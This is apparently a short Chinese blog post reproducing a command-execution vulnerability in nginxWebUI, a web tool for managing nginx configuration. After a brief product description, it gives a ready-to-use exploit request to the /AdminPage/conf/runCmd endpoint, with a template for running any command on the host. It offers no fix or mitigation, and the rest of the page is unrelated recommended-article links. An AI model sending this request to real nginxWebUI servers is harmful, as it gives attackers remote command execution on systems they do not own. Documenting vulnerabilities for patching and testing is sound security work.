nginxWebUI runCmd命令执行漏洞复现

仲瑿2023-07-25 19:09

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
wgc2k2 小时前
Node.js游戏服务器项目移植-2: 用TypeScript还是Javascript
服务器·游戏·node.js
草莓熊Lotso2 小时前
【Linux网络】深入理解 HTTP 协议(二):从协议格式到手写工业级 HTTP 服务器
linux·运维·服务器·网络·c++·http
上海云盾第一敬业销售3 小时前
服务器遭受攻击的应对策略及快速防护实践
运维·服务器·web安全·ddos
剑神一笑8 小时前
Linux pgrep 命令详解:按名称查找进程 PID 的高效方法
linux·运维·chrome
Lumbrologist8 小时前
【零基础部署】Docker 部署 CrewAI 多 Agent 编排框架保姆级教程
运维·docker·容器
yyuuuzz8 小时前
独立站的技术基础与常见运维问题
大数据·运维·服务器·网络·数据库·aws
剑神一笑8 小时前
Linux killall 命令详解:按进程名批量终止进程的原理与实践
linux·运维·chrome
雅菲奥朗9 小时前
企业级 AI 自动化|OpenClaw 龙虾实战与认证
运维·人工智能·自动化·openclaw
江华森10 小时前
Ansible 自动化运维:从入门到实战
运维·自动化·ansible
宋浮檀s12 小时前
应急响应——Web漏洞:命令执行+SSRF+弱口令
运维·数据库·sql·网络安全·oracle·应急响应
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05Codex 下载安装指南:Windows 和 macOS 官方版下载06Codex 接入 DeepSeek API 完整配置文档07CC-Switch & Claude 基于 Linux 服务器安装使用指南08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09几个好用的ip纯净度检测网站10DeepSeek V4 + Claude Code thinking mode 400 错误修复方案